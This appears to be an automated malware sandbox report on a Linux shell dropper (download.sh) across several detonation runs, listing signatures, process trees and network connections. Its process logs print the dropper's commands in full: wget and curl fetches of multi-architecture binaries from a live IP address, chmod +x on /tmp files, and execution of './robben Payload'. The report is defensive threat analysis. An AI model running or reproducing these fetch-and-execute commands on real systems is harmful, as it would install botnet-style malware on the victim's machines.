| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.97:80 | connectivity-check.ubuntu.com | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
270s
Max time network
276s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
182s
Max time network
183s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-QQoRad systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-mipsbe-20240611-en
Max time kernel
182s
Max time network
253s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
